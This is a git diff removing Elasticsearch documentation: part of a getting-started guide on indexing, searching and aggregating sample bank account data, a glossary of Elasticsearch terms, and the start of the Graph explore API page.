cluster status node.total node.data shards pri relo init unassign pending_tasks max_task_wait_time active_shards_percent -1565052807 00:53:27 elasticsearch green 3 3 6 3 0 0 0 0 - 100.0% --------------------------------------------------- -// TESTRESPONSE[s/1565052807 00:53:27 elasticsearch/\\d+ \\d+:\\d+:\\d+ integTest/] -// TESTRESPONSE[s/3 3 6 3/\\d+ \\d+ \\d+ \\d+/] -// TESTRESPONSE[s/0 0 -/0 \\d+ (-|\\d+(\.\\d+)?(micros|ms|s))/] -// TESTRESPONSE[non_json] -+ -NOTE: The cluster status will remain yellow if you are only running a single -instance of {es}. A single node cluster is fully functional, but data -cannot be replicated to another node to provide resiliency. Replica shards must -be available for the cluster status to be green. If the cluster status is red, -some data is unavailable. - -[discrete] -[[gs-curl]] -=== Talking to {es} with cURL commands - -Most of the examples in this guide enable you to copy the appropriate cURL -command and submit the request to your local {es} instance from the command line. - -A request to Elasticsearch consists of the same parts as any HTTP request: - -[source,sh] --------------------------------------------------- -curl -X '://:/?' -d '' --------------------------------------------------- -// NOTCONSOLE - -This example uses the following variables: - -``:: The appropriate HTTP method or verb. For example, `GET`, `POST`, -`PUT`, `HEAD`, or `DELETE`. -``:: Either `http` or `https`. Use the latter if you have an HTTPS -proxy in front of {es} or you use {es} {security-features} to encrypt HTTP -communications. -``:: The hostname of any node in your {es} cluster. Alternatively, use -+localhost+ for a node on your local machine. -``:: The port running the {es} HTTP service, which defaults to `9200`. -``:: The API endpoint, which can contain multiple components, such as -`_cluster/stats` or `_nodes/stats/jvm`. -``:: Any optional query-string parameters. For example, `?pretty` -will _pretty-print_ the JSON response to make it easier to read. -``:: A JSON-encoded request body (if necessary). - -If the {es} {security-features} are enabled, you must also provide a valid user -name (and password) that has authority to run the API. For example, use the -`-u` or `--u` cURL command parameter. For details about which security -privileges are required to run each API, see <>. - -{es} responds to each API request with an HTTP status code like `200 OK`. With -the exception of `HEAD` requests, it also returns a JSON-encoded response body. - -[discrete] -[[gs-other-install]] -=== Other installation options - -Installing {es} from an archive file enables you to easily install and run -multiple instances locally so you can try things out. To run a single instance, -you can run {es} in a Docker container, install {es} using the DEB or RPM -packages on Linux, install using Homebrew on macOS, or install using the MSI -package installer on Windows. See <> for more information. - -[[getting-started-index]] -== Index some documents - -Once you have a cluster up and running, you're ready to index some data. -There are a variety of ingest options for {es}, but in the end they all -do the same thing: put JSON documents into an {es} index. - -You can do this directly with a simple PUT request that specifies -the index you want to add the document, a unique document ID, and one or more -`"field": "value"` pairs in the request body: - -[source,console] --------------------------------------------------- -PUT /customer/_doc/1 -{ - "name": "John Doe" -} --------------------------------------------------- - -This request automatically creates the `customer` index if it doesn't already -exist, adds a new document that has an ID of `1`, and stores and -indexes the `name` field. - -Since this is a new document, the response shows that the result of the -operation was that version 1 of the document was created: - -[source,console-result] --------------------------------------------------- -{ - "_index" : "customer", - "_type" : "_doc", - "_id" : "1", - "_version" : 1, - "result" : "created", - "_shards" : { - "total" : 2, - "successful" : 2, - "failed" : 0 - }, - "_seq_no" : 26, - "_primary_term" : 4 -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/] -// TESTRESPONSE[s/"successful" : \d+/"successful" : $body._shards.successful/] -// TESTRESPONSE[s/"_primary_term" : \d+/"_primary_term" : $body._primary_term/] - - -The new document is available immediately from any node in the cluster. -You can retrieve it with a GET request that specifies its document ID: - -[source,console] --------------------------------------------------- -GET /customer/_doc/1 --------------------------------------------------- -// TEST[continued] - -The response indicates that a document with the specified ID was found -and shows the original source fields that were indexed. - -[source,console-result] --------------------------------------------------- -{ - "_index" : "customer", - "_type" : "_doc", - "_id" : "1", - "_version" : 1, - "_seq_no" : 26, - "_primary_term" : 4, - "found" : true, - "_source" : { - "name": "John Doe" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ ] -// TESTRESPONSE[s/"_primary_term" : \d+/"_primary_term" : $body._primary_term/] - -[discrete] -[[getting-started-batch-processing]] -=== Indexing documents in bulk - -If you have a lot of documents to index, you can submit them in batches with -the {ref}/docs-bulk.html[bulk API]. Using bulk to batch document -operations is significantly faster than submitting requests individually as it minimizes network roundtrips. - -The optimal batch size depends on a number of factors: the document size and complexity, the indexing and search load, and the resources available to your cluster. A good place to start is with batches of 1,000 to 5,000 documents -and a total payload between 5MB and 15MB. From there, you can experiment -to find the sweet spot. - -To get some data into {es} that you can start searching and analyzing: - -. Download the https://github.com/elastic/elasticsearch/blob/master/docs/src/test/resources/accounts.json?raw=true[`accounts.json`] sample data set. The documents in this randomly-generated data set represent user accounts with the following information: -+ -[source,js] --------------------------------------------------- -{ - "account_number": 0, - "balance": 16623, - "firstname": "Bradshaw", - "lastname": "Mckenzie", - "age": 29, - "gender": "F", - "address": "244 Columbus Place", - "employer": "Euron", - "email": "bradshawmckenzie@euron.com", - "city": "Hobucken", - "state": "CO" -} --------------------------------------------------- -// NOTCONSOLE - -. Index the account data into the `bank` index with the following `_bulk` request: -+ -[source,sh] --------------------------------------------------- -curl -H "Content-Type: application/json" -XPOST "localhost:9200/bank/_bulk?pretty&refresh" --data-binary "@accounts.json" -curl "localhost:9200/_cat/indices?v=true" --------------------------------------------------- -// NOTCONSOLE -+ -//// -This replicates the above in a document-testing friendly way but isn't visible -in the docs: -+ -[source,console] --------------------------------------------------- -GET /_cat/indices?v=true --------------------------------------------------- -// TEST[setup:bank] -//// -+ -The response indicates that 1,000 documents were indexed successfully. -+ -[source,txt] --------------------------------------------------- -health status index uuid pri rep docs.count docs.deleted store.size pri.store.size -yellow open bank l7sSYV2cQXmu6_4rJWVIww 5 1 1000 0 128.6kb 128.6kb --------------------------------------------------- -// TESTRESPONSE[s/128.6kb/\\d+(\\.\\d+)?[mk]?b/] -// TESTRESPONSE[s/l7sSYV2cQXmu6_4rJWVIww/.+/ non_json] - -[[getting-started-search]] -== Start searching - -Once you have ingested some data into an {es} index, you can search it -by sending requests to the `_search` endpoint. To access the full suite of -search capabilities, you use the {es} Query DSL to specify the -search criteria in the request body. You specify the name of the index you -want to search in the request URI. - -For example, the following request retrieves all documents in the `bank` -index sorted by account number: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { "match_all": {} }, - "sort": [ - { "account_number": "asc" } - ] -} --------------------------------------------------- -// TEST[continued] - -By default, the `hits` section of the response includes the first 10 documents -that match the search criteria: - -[source,console-result] --------------------------------------------------- -{ - "took" : 63, - "timed_out" : false, - "_shards" : { - "total" : 5, - "successful" : 5, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value": 1000, - "relation": "eq" - }, - "max_score" : null, - "hits" : [ { - "_index" : "bank", - "_type" : "_doc", - "_id" : "0", - "sort": [0], - "_score" : null, - "_source" : {"account_number":0,"balance":16623,"firstname":"Bradshaw","lastname":"Mckenzie","age":29,"gender":"F","address":"244 Columbus Place","employer":"Euron","email":"bradshawmckenzie@euron.com","city":"Hobucken","state":"CO"} - }, { - "_index" : "bank", - "_type" : "_doc", - "_id" : "1", - "sort": [1], - "_score" : null, - "_source" : {"account_number":1,"balance":39225,"firstname":"Amber","lastname":"Duke","age":32,"gender":"M","address":"880 Holmes Lane","employer":"Pyrami","email":"amberduke@pyrami.com","city":"Brogan","state":"IL"} - }, ... - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 63/"took" : $body.took/] -// TESTRESPONSE[s/\.\.\./$body.hits.hits.2, $body.hits.hits.3, $body.hits.hits.4, $body.hits.hits.5, $body.hits.hits.6, $body.hits.hits.7, $body.hits.hits.8, $body.hits.hits.9/] - -The response also provides the following information about the search request: - -* `took` – how long it took {es} to run the query, in milliseconds -* `timed_out` – whether or not the search request timed out -* `_shards` – how many shards were searched and a breakdown of how many shards -succeeded, failed, or were skipped. -* `max_score` – the score of the most relevant document found -* `hits.total.value` - how many matching documents were found -* `hits.sort` - the document's sort position (when not sorting by relevance score) -* `hits._score` - the document's relevance score (not applicable when using `match_all`) - -Each search request is self-contained: {es} does not maintain any -state information across requests. To page through the search hits, specify -the `from` and `size` parameters in your request. - -For example, the following request gets hits 10 through 19: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { "match_all": {} }, - "sort": [ - { "account_number": "asc" } - ], - "from": 10, - "size": 10 -} --------------------------------------------------- -// TEST[continued] - -Now that you've seen how to submit a basic search request, you can start to -construct queries that are a bit more interesting than `match_all`. - -To search for specific terms within a field, you can use a `match` query. -For example, the following request searches the `address` field to find -customers whose addresses contain `mill` or `lane`: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { "match": { "address": "mill lane" } } -} --------------------------------------------------- -// TEST[continued] - -To perform a phrase search rather than matching individual terms, you use -`match_phrase` instead of `match`. For example, the following request only -matches addresses that contain the phrase `mill lane`: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { "match_phrase": { "address": "mill lane" } } -} --------------------------------------------------- -// TEST[continued] - -To construct more complex queries, you can use a `bool` query to combine -multiple query criteria. You can designate criteria as required (must match), -desirable (should match), or undesirable (must not match). - -For example, the following request searches the `bank` index for accounts that -belong to customers who are 40 years old, but excludes anyone who lives in -Idaho (ID): - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { - "bool": { - "must": [ - { "match": { "age": "40" } } - ], - "must_not": [ - { "match": { "state": "ID" } } - ] - } - } -} --------------------------------------------------- -// TEST[continued] - -Each `must`, `should`, and `must_not` element in a Boolean query is referred -to as a query clause. How well a document meets the criteria in each `must` or -`should` clause contributes to the document's _relevance score_. The higher the -score, the better the document matches your search criteria. By default, {es} -returns documents ranked by these relevance scores. - -The criteria in a `must_not` clause is treated as a _filter_. It affects whether -or not the document is included in the results, but does not contribute to -how documents are scored. You can also explicitly specify arbitrary filters to -include or exclude documents based on structured data. - -For example, the following request uses a range filter to limit the results to -accounts with a balance between $20,000 and $30,000 (inclusive). - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "query": { - "bool": { - "must": { "match_all": {} }, - "filter": { - "range": { - "balance": { - "gte": 20000, - "lte": 30000 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[[getting-started-aggregations]] -== Analyze results with aggregations - -{es} aggregations enable you to get meta-information about your search results -and answer questions like, "How many account holders are in Texas?" or -"What's the average balance of accounts in Tennessee?" You can search -documents, filter hits, and use aggregations to analyze the results all in one -request. - -For example, the following request uses a `terms` aggregation to group -all of the accounts in the `bank` index by state, and returns the ten states -with the most accounts in descending order: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "size": 0, - "aggs": { - "group_by_state": { - "terms": { - "field": "state.keyword" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The `buckets` in the response are the values of the `state` field. The -`doc_count` shows the number of accounts in each state. For example, you -can see that there are 27 accounts in `ID` (Idaho). Because the request -set `size=0`, the response only contains the aggregation results. - -[source,console-result] --------------------------------------------------- -{ - "took": 29, - "timed_out": false, - "_shards": { - "total": 5, - "successful": 5, - "skipped" : 0, - "failed": 0 - }, - "hits" : { - "total" : { - "value": 1000, - "relation": "eq" - }, - "max_score" : null, - "hits" : [ ] - }, - "aggregations" : { - "group_by_state" : { - "doc_count_error_upper_bound": 20, - "sum_other_doc_count": 770, - "buckets" : [ { - "key" : "ID", - "doc_count" : 27 - }, { - "key" : "TX", - "doc_count" : 27 - }, { - "key" : "AL", - "doc_count" : 25 - }, { - "key" : "MD", - "doc_count" : 25 - }, { - "key" : "TN", - "doc_count" : 23 - }, { - "key" : "MA", - "doc_count" : 21 - }, { - "key" : "NC", - "doc_count" : 21 - }, { - "key" : "ND", - "doc_count" : 21 - }, { - "key" : "ME", - "doc_count" : 20 - }, { - "key" : "MO", - "doc_count" : 20 - } ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 29/"took": $body.took/] - - -You can combine aggregations to build more complex summaries of your data. For -example, the following request nests an `avg` aggregation within the previous -`group_by_state` aggregation to calculate the average account balances for -each state. - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "size": 0, - "aggs": { - "group_by_state": { - "terms": { - "field": "state.keyword" - }, - "aggs": { - "average_balance": { - "avg": { - "field": "balance" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Instead of sorting the results by count, you could sort using the result of -the nested aggregation by specifying the order within the `terms` aggregation: - -[source,console] --------------------------------------------------- -GET /bank/_search -{ - "size": 0, - "aggs": { - "group_by_state": { - "terms": { - "field": "state.keyword", - "order": { - "average_balance": "desc" - } - }, - "aggs": { - "average_balance": { - "avg": { - "field": "balance" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -In addition to basic bucketing and metrics aggregations like these, {es} -provides specialized aggregations for operating on multiple fields and -analyzing particular types of data such as dates, IP addresses, and geo -data. You can also feed the results of individual aggregations into pipeline -aggregations for further analysis. - -The core analysis capabilities provided by aggregations enable advanced -features such as using machine learning to detect anomalies. - -[[getting-started-next-steps]] -== Where to go from here - -Now that you've set up a cluster, indexed some documents, and run some -searches and aggregations, you might want to: - -* {stack-gs}/get-started-elastic-stack.html#install-kibana[Dive in to the Elastic -Stack Tutorial] to install Kibana, Logstash, and Beats and -set up a basic system monitoring solution. - -* {kibana-ref}/add-sample-data.html[Load one of the sample data sets into Kibana] -to see how you can use {es} and Kibana together to visualize your data. - -* Try out one of the Elastic search solutions: -** https://swiftype.com/documentation/site-search/crawler-quick-start[Site Search] -** https://swiftype.com/documentation/app-search/getting-started[App Search] -** https://swiftype.com/documentation/enterprise-search/getting-started[Enterprise Search] diff --git a/docs/reference/glossary.asciidoc b/docs/reference/glossary.asciidoc deleted file mode 100644 index 1d9852720eb..00000000000 --- a/docs/reference/glossary.asciidoc +++ /dev/null @@ -1,574 +0,0 @@ -[glossary] -[[glossary]] -= Glossary of terms - -[glossary] -[[glossary-analysis]] analysis :: -+ --- -// tag::analysis-def[] -Analysis is the process of converting <> to -<>. Depending on which analyzer is used, these phrases: -`FOO BAR`, `Foo-Bar`, `foo,bar` will probably all result in the -terms `foo` and `bar`. These terms are what is actually stored in -the index. - -A full text query (not a <> query) for `FoO:bAR` will -also be analyzed to the terms `foo`,`bar` and will thus match the -terms stored in the index. - -It is this process of analysis (both at index time and at search time) -that allows Elasticsearch to perform full text queries. - -Also see <> and <>. -// end::analysis-def[] --- - -[[glossary-api-key]] API key :: -// tag::api-key-def[] -A unique identifier that you can use for authentication when submitting {es} requests. -When TLS is enabled, all requests must be authenticated using either basic authentication -(user name and password) or an API key. -// end::api-key-def[] - - -[[glossary-auto-follow-pattern]] auto-follow pattern :: -// tag::auto-follow-pattern-def[] -An <> that automatically configures new indices as -<> for <>. -For more information, see {ref}/ccr-auto-follow.html[Managing auto follow patterns]. -// end::auto-follow-pattern-def[] - -[[glossary-cluster]] cluster :: -// tag::cluster-def[] -One or more <> that share the -same cluster name. Each cluster has a single master node, which is -chosen automatically by the cluster and can be replaced if it fails. -// end::cluster-def[] - -[[glossary-cold-phase]] cold phase :: -// tag::cold-phase-def[] -The third possible phase in the <>. -In the cold phase, an index is no longer updated and seldom queried. -The information still needs to be searchable, but it’s okay if those queries are slower. -// end::cold-phase-def[] - -[[glossary-cold-tier]] cold tier:: -// tag::cold-tier-def[] -A <> that contains nodes that hold time series data -that is accessed occasionally and not normally updated. -// end::cold-tier-def[] - -[[glossary-component-template]] component template :: -// tag::component-template-def[] -A building block for constructing <> that specifies index -<>, <>, and <>. -// end::component-template-def[] - -[[glossary-content-tier]] content tier:: -// tag::content-tier-def[] -A <> that contains nodes that handle the indexing and query load for -content such as a product catalog. -// end::content-tier-def[] - -[[glossary-ccr]] {ccr} (CCR):: -// tag::ccr-def[] -A feature that enables you to replicate indices in remote clusters to your -local cluster. For more information, see -{ref}/xpack-ccr.html[{ccr-cap}]. -// end::ccr-def[] - -[[glossary-ccs]] {ccs} (CCS):: - -The {ccs} feature enables any node to act as a federated client across -multiple clusters. See <>. - -[[glossary-data-stream]] data stream :: -+ --- -// tag::data-stream-def[] -A named resource used to ingest, search, and manage time series data in {es}. A -data stream's data is stored across multiple hidden, auto-generated -<>. You can automate management of these indices to more -efficiently store large data volumes. - -See {ref}/data-streams.html[Data streams]. -// end::data-stream-def[] --- - -[[glossary-data-tier]] data tier:: -// tag::data-tier-def[] -A collection of nodes with the same data role that typically share the same hardware profile. -See <>, <>, <>, -<>. -// end::data-tier-def[] - -[[glossary-delete-phase]] delete phase :: -// tag::delete-phase-def[] -The last possible phase in the <>. -In the delete phase, an index is no longer needed and can safely be deleted. -// end::delete-phase-def[] - -[[glossary-document]] document :: - -A document is a JSON document which is stored in Elasticsearch. It is -like a row in a table in a relational database. Each document is -stored in an <> and has a <> and an -<>. -+ -A document is a JSON object (also known in other languages as a hash / -hashmap / associative array) which contains zero or more -<>, or key-value pairs. -+ -The original JSON document that is indexed will be stored in the -<>, which is returned by default when -getting or searching for a document. - -[[glossary-field]] field :: - -A <> contains a list of fields, or key-value -pairs. The value can be a simple (scalar) value (eg a string, integer, -date), or a nested structure like an array or an object. A field is -similar to a column in a table in a relational database. -+ -The <> for each field has a field _type_ (not to -be confused with document <>) which indicates the type -of data that can be stored in that field, eg `integer`, `string`, -`object`. The mapping also allows you to define (amongst other things) -how the value for a field should be analyzed. - -[[glossary-filter]] filter :: -// tag::filter-def[] -A filter is a non-scoring <>, -meaning that it does not score documents. -It is only concerned about answering the question - "Does this document match?". -The answer is always a simple, binary yes or no. This kind of query is said to be made -in a {ref}/query-filter-context.html[filter context], -hence it is called a filter. Filters are simple checks for set inclusion or exclusion. -In most cases, the goal of filtering is to reduce the number of documents that have to be examined. -// end::filter-def[] - -[[glossary-flush]] flush :: -// tag::flush-def[] -Peform a Lucene commit to write index updates in the transaction log (translog) to disk. -Because a Lucene commit is a relatively expensive operation, -{es} records index and delete operations in the translog and -automatically flushes changes to disk in batches. -To recover from a crash, operations that have been acknowledged but not yet committed -can be replayed from the translog. -Before upgrading, you can explicitly call the {ref}/indices-flush.html[Flush] API -to ensure that all changes are committed to disk. -// end::flush-def[] - -[[glossary-follower-index]] follower index :: -// tag::follower-index-def[] -The target index for <>. A follower index exists -in a local cluster and replicates a <>. -// end::follower-index-def[] - -[[glossary-force-merge]] force merge :: -// tag::force-merge-def[] -// tag::force-merge-def-short[] -Manually trigger a merge to reduce the number of segments in each shard of an index -and free up the space used by deleted documents. -// end::force-merge-def-short[] -You should not force merge indices that are actively being written to. -Merging is normally performed automatically, but you can use force merge after -<> to reduce the shards in the old index to a single segment. -See the {ref}/indices-forcemerge.html[force merge API]. -// end::force-merge-def[] - -[[glossary-freeze]] freeze :: -// tag::freeze-def[] -// tag::freeze-def-short[] -Make an index read-only and minimize its memory footprint. -// end::freeze-def-short[] -Frozen indices can be searched without incurring the overhead of of re-opening a closed index, -but searches are throttled and might be slower. -You can freeze indices to reduce the overhead of keeping older indices searchable -before you are ready to archive or delete them. -See the {ref}/freeze-index-api.html[freeze API]. -// end::freeze-def[] - -[[glossary-frozen-index]] frozen index :: -// tag::frozen-index-def[] -An index reduced to a low overhead state that still enables occasional searches. -Frozen indices use a memory-efficient shard implementation and throttle searches to conserve resources. -Searching a frozen index is lower overhead than re-opening a closed index to enable searching. -// end::frozen-index-def[] - -[[glossary-hidden-index]] hidden index :: -// tag::hidden-index-def[] -An index that is excluded by default when you access indices using a wildcard expression. -You can specify the `expand_wildcards` parameter to include hidden indices. -Note that hidden indices _are_ included if the wildcard expression starts with a dot, for example `.watcher-history*`. -// end::hidden-index-def[] - -[[glossary-hot-phase]] hot phase :: -// tag::hot-phase-def[] -The first possible phase in the <>. -In the hot phase, an index is actively updated and queried. -// end::hot-phase-def[] - -[[glossary-hot-tier]] hot tier:: -// tag::hot-tier-def[] -A <> that contains nodes that handle the indexing load -for time series data such as logs or metrics and hold your most recent, -most-frequently-accessed data. -// end::hot-tier-def[] - -[[glossary-id]] id :: - -The ID of a <> identifies a document. The -`index/id` of a document must be unique. If no ID is provided, -then it will be auto-generated. (also see <>) - -[[glossary-index]] index :: -+ --- -// tag::index-def[] -// tag::index-def-short[] -An optimized collection of JSON documents. Each document is a collection of fields, -the key-value pairs that contain your data. -// end::index-def-short[] - -An index is a logical namespace which maps to one or more -<> and can have zero or more -<>. -// end::index-def[] --- - -[[glossary-index-alias]] index alias :: -+ --- -// tag::index-alias-def[] -// tag::index-alias-desc[] -An index alias is a secondary name -used to refer to one or more existing indices. - -Most {es} APIs accept an index alias -in place of an index name. -// end::index-alias-desc[] - -See {ref}/indices-add-alias.html[Add index alias]. -// end::index-alias-def[] --- - -[[glossary-index-lifecycle]] index lifecycle :: -// tag::index-lifecycle-def[] -The four phases an index can transition through: -<>, <>, -<>, and <>. -For more information, see {ref}/ilm-policy-definition.html[Index lifecycle]. -// end::index-lifecycle-def[] - -[[glossary-index-lifecycle-policy]] index lifecycle policy :: -// tag::index-lifecycle-policy-def[] -Specifies how an index moves between phases in the index lifecycle and -what actions to perform during each phase. -// end::index-lifecycle-policy-def[] - -[[glossary-index-pattern]] index pattern :: -// tag::index-pattern-def[] -A string that can contain the `*` wildcard to match multiple index names. -In most cases, the index parameter in an {es} request can be the name of a specific index, -a list of index names, or an index pattern. -For example, if you have the indices `datastream-000001`, `datastream-000002`, and `datastream-000003`, -to search across all three you could use the `datastream-*` index pattern. -// end::index-pattern-def[] - -[[glossary-index-template]] index template :: -+ --- -// tag::index-template-def[] -// tag::index-template-def-short[] -Defines settings and mappings to apply to new indexes that match a simple naming pattern, such as _logs-*_. -// end::index-template-def-short[] -An index template can also attach a lifecycle policy to the new index. -Index templates are used to automatically configure indices created during <>. -// end::index-template-def[] --- - -[[glossary-leader-index]] leader index :: -// tag::leader-index-def[] -The source index for <>. A leader index exists -on a remote cluster and is replicated to -<>. - -[[glossary-local-cluster]] local cluster :: -// tag::local-cluster-def[] -The cluster that pulls data from a <> in {ccs} or {ccr}. -// end::local-cluster-def[] - -[[glossary-mapping]] mapping :: - -A mapping is like a _schema definition_ in a relational database. Each -<> has a mapping, which defines a <>, -plus a number of index-wide settings. -+ -A mapping can either be defined explicitly, or it will be generated -automatically when a document is indexed. - -[[glossary-node]] node :: - -A node is a running instance of Elasticsearch which belongs to a -<>. Multiple nodes can be started on a single -server for testing purposes, but usually you should have one node per -server. -+ -At startup, a node will use unicast to discover an existing cluster with -the same cluster name and will try to join that cluster. - -[[glossary-primary-shard]] primary shard :: - -Each document is stored in a single primary <>. When -you index a document, it is indexed first on the primary shard, then -on all <> of the primary shard. -+ -By default, an <> has one primary shard. You can specify -more primary shards to scale the number of <> -that your index can handle. -+ -You cannot change the number of primary shards in an index, once the index is -created. However, an index can be split into a new index using the -<>. -+ -See also <> - -[[glossary-query]] query :: - -A request for information from {es}. You can think of a query as a question, -written in a way {es} understands. A search consists of one or more queries -combined. -+ -There are two types of queries: _scoring queries_ and _filters_. For more -information about query types, see <>. - -[[glossary-recovery]] recovery :: -+ --- -Shard recovery is the process -of syncing a <> -from a <>. -Upon completion, -the replica shard is available for search. - -// tag::recovery-triggers[] -Recovery automatically occurs -during the following processes: - -* Node startup or failure. - This type of recovery is called a *local store recovery*. -* <>. -* Relocation of a shard to a different node in the same cluster. -* {ref}/snapshots-restore-snapshot.html[Snapshot restoration]. -// end::recovery-triggers[] --- - -[[glossary-reindex]] reindex :: -+ --- -// tag::reindex-def[] -Copies documents from a _source_ to a _destination_. The source and -destination can be any pre-existing index, index alias, or -{ref}/data-streams.html[data stream]. - -You can reindex all documents from a source or select a subset of documents to -copy. You can also reindex to a destination in a remote cluster. - -A reindex is often performed to update mappings, change static index settings, -or upgrade {es} between incompatible versions. -// end::reindex-def[] --- - -[[glossary-remote-cluster]] remote cluster :: - -// tag::remote-cluster-def[] -A separate cluster, often in a different data center or locale, that contains indices that -can be replicated or searched by the <>. -The connection to a remote cluster is unidirectional. -// end::remote-cluster-def[] - -[[glossary-replica-shard]] replica shard :: - -Each <> can have zero or more -replicas. A replica is a copy of the primary shard, and has two -purposes: -+ -1. increase failover: a replica shard can be promoted to a primary -shard if the primary fails -2. increase performance: get and search requests can be handled by -primary or replica shards. -+ -By default, each primary shard has one replica, but the number of -replicas can be changed dynamically on an existing index. A replica -shard will never be started on the same node as its primary shard. - -[[glossary-rollover]] rollover :: -+ --- -// tag::rollover-def[] -// tag::rollover-def-short[] -Creates a new index for a rollover target when the existing index reaches a certain size, number of docs, or age. -A rollover target can be either an <> or a <>. -// end::rollover-def-short[] - -For example, if you're indexing log data, you might use rollover to create daily or weekly indices. -See the {ref}/indices-rollover-index.html[rollover index API]. -// end::rollover-def[] --- - -[[glossary-rollup]] rollup :: -// tag::rollup-def[] -Summarize high-granularity data into a more compressed format to -maintain access to historical data in a cost-effective way. -// end::rollup-def[] - -[[glossary-rollup-index]] rollup index :: -// tag::rollup-index-def[] -A special type of index for storing historical data at reduced granularity. -Documents are summarized and indexed into a rollup index by a <>. -// end::rollup-index-def[] - -[[glossary-rollup-job]] rollup job :: -// tag::rollup-job-def[] -A background task that runs continuously to summarize documents in an index and -index the summaries into a separate rollup index. -The job configuration controls what information is rolled up and how often. -// end::rollup-job-def[] - -[[glossary-routing]] routing :: - -When you index a document, it is stored on a single -<>. That shard is chosen by hashing -the `routing` value. By default, the `routing` value is derived from -the ID of the document or, if the document has a specified parent -document, from the ID of the parent document (to ensure that child and -parent documents are stored on the same shard). -+ -This value can be overridden by specifying a `routing` value at index -time, or a <> in the <>. - -[[glossary-searchable-snapshot]] searchable snapshot :: -// tag::searchable-snapshot-def[] -A <> of an index that has been mounted as a -<> and can be -searched as if it were a regular index. -// end::searchable-snapshot-def[] - -[[glossary-searchable-snapshot-index]] searchable snapshot index :: -// tag::searchable-snapshot-index-def[] -An <> whose data is stored in a <> that resides in a separate <> such as AWS S3. Searchable snapshot indices do not need -<> shards for resilience, since their data is -reliably stored outside the cluster. -// end::searchable-snapshot-index-def[] - -[[glossary-shard]] shard :: -+ --- -// tag::shard-def[] -A shard is a single Lucene instance. It is a low-level “worker” unit -which is managed automatically by Elasticsearch. An index is a logical -namespace which points to <> and -<> shards. -+ -Other than defining the number of primary and replica shards that an -index should have, you never need to refer to shards directly. -Instead, your code should deal only with an index. -+ -Elasticsearch distributes shards amongst all <> in the -<>, and can move shards automatically from one -node to another in the case of node failure, or the addition of new -nodes. -// end::shard-def[] --- - -[[glossary-shrink]] shrink :: -// tag::shrink-def[] -// tag::shrink-def-short[] -Reduce the number of primary shards in an index. -// end::shrink-def-short[] -You can shrink an index to reduce its overhead when the request volume drops. -For example, you might opt to shrink an index once it is no longer the write index. -See the {ref}/indices-shrink-index.html[shrink index API]. -// end::shrink-def[] - -[[glossary-snapshot]] snapshot :: -// tag::snapshot-def[] -Captures the state of the whole cluster or of particular indices or data -streams at a particular point in time. Snapshots provide a back up of a running -cluster, ensuring you can restore your data in the event of a failure. You can -also mount indices or datastreams from snapshots as read-only -{ref}/glossary.html#glossary-searchable-snapshot-index[searchable snapshots]. -// end::snapshot-def[] - -[[glossary-snapshot-lifecycle-policy]] snapshot lifecycle policy :: -// tag::snapshot-lifecycle-policy-def[] -Specifies how frequently to perform automatic backups of a cluster and -how long to retain the resulting snapshots. -// end::snapshot-lifecycle-policy-def[] - -[[glossary-snapshot-repository]] snapshot repository :: -// tag::snapshot-repository-def[] -Specifies where snapshots are to be stored. -Snapshots can be written to a shared filesystem or to a remote repository. -// end::snapshot-repository-def[] - -[[glossary-source_field]] source field :: - -By default, the JSON document that you index will be stored in the -`_source` field and will be returned by all get and search requests. -This allows you access to the original object directly from search -results, rather than requiring a second step to retrieve the object -from an ID. - -[[glossary-system-index]] system index :: -// tag::system-index-def[] -An index that contains configuration information or other data used internally by the system, -such as the `.security` index. -The name of a system index is always prefixed with a dot. -You should not directly access or modify system indices. -// end::system-index-def[] - -[[glossary-term]] term :: - -A term is an exact value that is indexed in Elasticsearch. The terms -`foo`, `Foo`, `FOO` are NOT equivalent. Terms (i.e. exact values) can -be searched for using _term_ queries. -+ -See also <> and <>. - -[[glossary-text]] text :: - -Text (or full text) is ordinary unstructured text, such as this -paragraph. By default, text will be <> into -<>, which is what is actually stored in the index. -+ -Text <> need to be analyzed at index time in order to -be searchable as full text, and keywords in full text queries must be -analyzed at search time to produce (and search for) the same terms -that were generated at index time. -+ -See also <> and <>. - -[[glossary-type]] type :: - -A type used to represent the _type_ of document, e.g. an `email`, a `user`, or a `tweet`. -Types are deprecated and are in the process of being removed. -See {ref}/removal-of-types.html[Removal of mapping types]. -// end::type-def[] - -[[glossary-warm-phase]] warm phase :: -// tag::warm-phase-def[] -The second possible phase in the <>. -In the warm phase, an index is generally optimized for search and no longer updated. -// end::warm-phase-def[] - -[[glossary-warm-tier]] warm tier:: -// tag::warm-tier-def[] -A <> that contains nodes that hold time series data -that is accessed less frequently and rarely needs to be updated. -// end::warm-tier-def[] diff --git a/docs/reference/graph/explore.asciidoc b/docs/reference/graph/explore.asciidoc deleted file mode 100644 index 204957ee6e1..00000000000 --- a/docs/reference/graph/explore.asciidoc +++ /dev/null @@ -1,424 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[graph-explore-api]] -== Graph explore API - -The Graph explore API enables you to extract and summarize information about -the documents and terms in your Elasticsearch index. - -The easiest way to understand the behaviour of this API is to use the -Graph UI to explore connections. You can view the most recent request submitted -to the `_explore` endpoint from the *Last request* panel. For more information, -see {kibana-ref}/graph-getting-started.html[Getting Started with Graph]. - -For additional information about working with the explore API, see the Graph -{kibana-ref}/graph-troubleshooting.html[Troubleshooting] and -{kibana-ref}/graph-limitations.html[Limitations] topics. - -NOTE: The graph explore API is enabled by default. To disable access to the -graph explore API and the Kibana {kibana-ref}/graph-getting-started.html[Graph -UI], add `xpack.graph.enabled: false` to 